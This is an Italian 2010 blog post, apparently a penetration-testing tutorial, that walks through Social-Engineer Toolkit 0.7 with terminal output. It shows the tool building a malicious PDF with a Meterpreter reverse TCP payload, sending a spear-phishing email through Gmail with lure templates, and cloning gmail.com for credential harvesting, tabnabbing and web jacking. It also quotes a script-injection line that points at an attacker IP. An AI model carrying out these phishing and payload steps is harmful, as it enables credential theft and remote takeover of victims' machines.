VoIP and Hacking | Consulenza Documentazione

Social-Engineering Toolkit 0.7

by admin on Sep.16, 2010, under Hacking, Sicurezza, Tools

Ho già parlato altre volte del Social-Engineer Toolkit (o SET). Dall’ultima volta che è capitato (Maggio di quest’anno) il tool ha subito non una ma ben due evoluzioni significative, essendo giunto nel frattempo alla versione 0.7.

Per chi fosse nuovo a questo argomento, SET è una suite di tools (sviluppata in python) focalizzata ad attaccare l’elemento umano nell’ambito (si spera) di una legittima attività di penetration testing.
Per costoro, una nuova installazione del tool può essere fatta così:

Per ottenere una copia di SET:

/opt# svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
A SET/config
A SET/config/set_config
[...]

Per chi ne avesse impiegato versioni precedenti invece:

/opt/SET# svn update
U config/set_config
A src/multi_attack
A src/multi_attack/multiattack.py
U src/payloadgen/solo.py
[...]

Con la avvertenza, al termine, di dover installare BeautifulSoup, un HTML/XML parser per Python

Updated to revision 324.
/opt/SET# ./set
Error!!! BeautifulSoup is required in order to fully run SET
Please download and install BeautifulSoup: http://www.crummy.com/software/BeautifulSoup/download/3.x/BeautifulSoup-3.0.8.1.tar.gz
Would you like SET to attempt to install it for you?
yes or no: yes
[*] Installing BeautifulSoup...
--2010-09-15 00:06:59--  http://www.crummy.com/software/BeautifulSoup/download/3.x/BeautifulSoup-3.0.8.1.tar.gz
Resolving www.crummy.com... 66.160.141.133
Connecting to www.crummy.com|66.160.141.133|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31080 (30K) [application/x-gzip]
Saving to: `BeautifulSoup-3.0.8.1.tar.gz'
[...]
running install_egg_info
Writing /usr/local/lib/python2.6/dist-packages/BeautifulSoup-3.0.8.1.egg-info
[*] Finished... Relaunch SET, if it doesn't work for you, install manually.
/opt/SET# ./set

	   d888888o.   8 8888888888 8888888 8888888888
	 .`8888:' `88. 8 8888             8 8888
	 8.`8888.   Y8 8 8888             8 8888
	 `8.`8888.     8 8888             8 8888
	  `8.`8888.    8 888888888888     8 8888
	   `8.`8888.   8 8888             8 8888
	    `8.`8888.  8 8888             8 8888
	8b   `8.`8888. 8 8888             8 8888
	`8b.  ;8.`8888 8 8888             8 8888
	 `Y8888P ,88P' 8 888888888888     8 8888

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Written by David Kennedy (ReL1K)          [---]
  [---]                 Version: 0.7                     [---]
  [---]             Codename: 'Swagger Wagon'            [---]
  [---]     Report bugs to: davek@social-engineer.org    [---]
  [---]        Java Applet Written by: Thomas Werth      [---]
  [---]        Homepage: http://www.secmaniac.com        [---]
  [---]     Framework: http://www.social-engineer.org    [---]
  [---]       Over 1 million downloads and counting.     [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..

             Follow me on Twitter: dave_rel1k

     DerbyCon 2011 Sep29-Oct02 - A new era begins...
  irc.freenode.net - #DerbyCon - http://www.derbycon.com

Select from the menu:

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
3.  Infectious Media Generator
4.  Create a Payload and Listener
5.  Mass Mailer Attack
6.  Teensy USB HID Attack Vector
7   Update the Metasploit Framework
8.  Update the Social-Engineer Toolkit
9.  Help, Credits, and About
10. Exit the Social-Engineer Toolkit

Enter your choice:

Il menu “Spear-Phishing Attack” viene usato per mettere in atto attacchi basati su email. Questi possono essere multipli o individuali. Si può utilizzare un particolare fileformat (per esempio sfruttando un bug PDF) e quindi inviare il malizioso allegato alla vittima per comprometterne il sistema. Si possono creare ed archiviare i propri templates da riutilizzare in futuri attacchi o anche fare uso di modelli predefiniti.

Proviamo a seguirne l’impostazione fino al momento dell’invio:

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

I formati disponibili per essere utilizzati come vettori per i payloads (ed i payloads stessi) sono ulteriormente aumentati:

Enter your choice: 1

Select the file format exploit you want.
The default is the PDF embedded EXE.

        ********** PAYLOADS **********

1. Adobe CoolType SING Table 'uniqueName' Overflow (0day)
2. Adobe Flash Player 'newfunction' Invalid Pointer Use
3. Adobe Collab.collectEmailInfo Buffer Overflow
4. Adobe Collab.getIcon Buffer Overflow
5. Adobe JBIG2Decode Memory Corruption Exploit
6. Adobe PDF Embedded EXE Social Engineering
7. Adobe util.printf() Buffer Overflow
8. Custom EXE to VBA (sent via RAR) (RAR required)
9. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun

Enter the number you want (press enter for default): 2

Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.10:443
[*] Creating 'template.pdf' file...
[*] Generated output file /opt/SET/src/program_junk/template.pdf

[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.

As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 1
Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft
a one time email template. 

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1
Below is a list of available templates:

1: Baby Pics
2: Status Report
3: Strange internet usage from your computer
4: Dan Brown's Angels & Demons
5: New Update
6: Computer Issue
7: LOL...have to check this out...

Enter the number you want to use: 1

Enter who you want to send email to: pinco.pallino@gmail.com

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1
Enter your GMAIL email address: pinco.pallino@gmail.com
Enter your password for gmail (it will not be displayed back to you):

SET has finished delivering the emails.

Do you want to setup a listener yes or no: no

SET has completed.

A parte la stranezza di non impostare un listener dato il tipo di payload scelto (dato che si era deciso di seguire solo la fase iniziale dell’attacco), c’è da notare come lo spear-phishing si integra in Google mail e come possa venire completamente customizzato.

Il Web Attack Vector viene invece usato per mettere in atto attacchi phishing nella speranza che una vittima clicchi su di un link.
Ne avevamo già parlato a proposito dell’allestimento di un sito trappola.
Ora è presente una ampia varietà di attacchi:

Select from the menu:

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
[...]

Enter your choice: 2

The Social-Engineer Toolkit "Web Attack" vector is a unique way of
utilizing multiple web-based attacks in order to compromise the
intended victim. 

Enter what type of attack you would like to utilize.

The Java Applet attack will spoof a Java Certificate and
deliver a metasploit based payload. Uses a customized
java applet created by Thomas Werth to deliver
the payload.

The Metasploit browser exploit method will utilize select
Metasploit browser exploits through an iframe and deliver
a Metasploit payload.

The Credential Harvester Method will utilize web cloning
of a website that has a username and password field and
harvest all the information posted to the website.

The TabNabbing Method will wait for a user to move to a
different tab, then refresh the page to something different.

The Man Left in the Middle Attack Method was introduced by
Kos and utilizes HTTP REFERER's in order to intercept fields
and harvest data from them. You need to have an already vulnerable
site and incorporate <script src="http://YOURIP/">. This could either
be from a compromised site or through XSS.

The web jacking attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.

The multi-attack will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.

1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default):

Tra questi il “Metasploit Browser Exploit Method” farà uso dell’ exploit browser-side selezionato fra quelli messi a disposizione da Metasploit, e sfruttando un iframe per rilasciare il payload Metasploit .

Il “Credential Harvester Method” utilizza anch’esso il web cloning di un sito web che preveda normalmente l’inserimento di credenziali come username e password e quindi colleziona le informazioni inviate al website. Gli usernames e le passwords verranno inviate alla macchina attaccante, dopodiché la vittima verrà rediretta al sito legittimo.
Notevole anche la funzionalità, quando l’attaccante usi la sequenza CONTROL-C, che un report venga generato in due formati. Il primo in html, e l’altro in xml nell’eventualità di dover effettuare il parsing delle informazioni con un diverso tool.

Il TabNabbing Method (insidia scoperta piuttosto recentemente e che ha sollevato parecchio rumore) attenderà che un utente si sia spostato su di un tab differente, quindi sostituirà la pagina con qualcosa di diverso, preferibilmente con un clone malevolo della precedente,. In alternativa un attaccante potrebbe fare uso di un sito ad ampio accesso in modo che la vittima cliccando sul tab originale dopo un certo periodo di tempo, possa con una certa probabilità pensare di essere stato scollegato dal proprio abituale programma weemail per la scadenza di un timeout e quindi reintrodurre le proprie credentiali. Una volta inserite le credenziali, verranno inviate alla macchina attaccante, dopodiché la vittima verrà rediretta ancora una volta al sito legittimo.

Il “Web Jacking Attack Method” si basa anch’esso su di un website clone ma presenta alla vittima una notifica che il website è stato trasferito ed il relativo link. Si tratta di una nuova feature introdotta appunto in questa versione 0.7. Passando sul link, la URL verrà presentata come la reale URL, non quella della macchina attaccante. Se per esempio si fosse clonato gmail.com, la url evidenziata passando sopra il link sarebbe proprio gmail.com. Quando l’utente clicca sul link, gmail si apre e viene immediatamente sostituita con un webserver malizioso.

Anche il “Multi-attack Web Vector” è una novità apparsa nella versione 0.7 e consiste nella possibilità di specificare molteplici metodi di “web attack” per alla fine attuarne uno valido. Ad esempio,in certe situazioni, un attacco basato su Java Applet potrebbe fallire mentre un expoit internet explorer potrebbe avere successo. O potrebbe succedere che entrambi falliscano ed il metodo “Credential Harvester” vada a buon fine. Il metodo “Multi-Attack Vector” permette di attivare e disattivare differenti vettori combinandoli infine in una unica specifica webpage.
Non tutti i vettori di attacco possono venire sempre combinati insieme.

[...]
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default): 7

The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.

The second method will completely clone a website of your
choosing and allow you to utilize the attack vectors within
the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com

[*************************************************************]

                Multi-Attack Web Attack Vector

[*************************************************************]

 The multi attack vector utilizes each combination of attacks
 and allow the user to choose the method for the attack. Once
 you select one of the attacks, it will be added to your
 attack profile to be used to stage the attack vector. When
 your finished be sure to select the 'Im finished' option.

Select which attacks you want to use:

1. The Java Applet Attack Method (ON)
2. The Metasploit Browser Exploit Method (ON)
3. Credential Harvester Attack Method (ON)
4. Tabnabbing Attack Method (ON)
5. Man Left in the Middle Attack Method (OFF)
6. Web Jacking Attack Method (OFF)
7. Use them all - A.K.A. 'Tactical Nuke'
8. I'm finished and want proceed with the attack.
9. Return to main menu.

Enter your choice one at a time (hit 8 or enter to launch)

La opzione “Tactical Nuke”, cioè la 7 abilita tutti i vettori di attacco automaticamente.
Nell’esempio precedente si può osservare come i flags relativi ai metodi di attacco Java Applet, Metasploit Browser Exploit, Credential Harvester, e Web Jacking siano abilitati. Per procedere basta dare enter o usare la opzione 8.

Tornando al livello del menu principale di SET, “Infectious Media Generator” è un relativamente semplice vettore d’attacco. SET qui crea un payload Metasploit-based, imposta un listener e genera un folder che deve essere trasferito su di un drive DVD/USB. Una volta inserito, se AutoRun è abilitato, il codice verrà automaticamente mandato in esecuzione consentendo di assumere il controllo della macchina.

Send post as PDF to PDF | PDF Creator | PDF Converter
:, , , ,

Comments are closed.

Cerchi qualcosa in particolare?

Usa il form qui sotto per cercare nel sito:

Blogroll!

Alcuni links...

Archives

Tutte le entries, in ordine cronologio...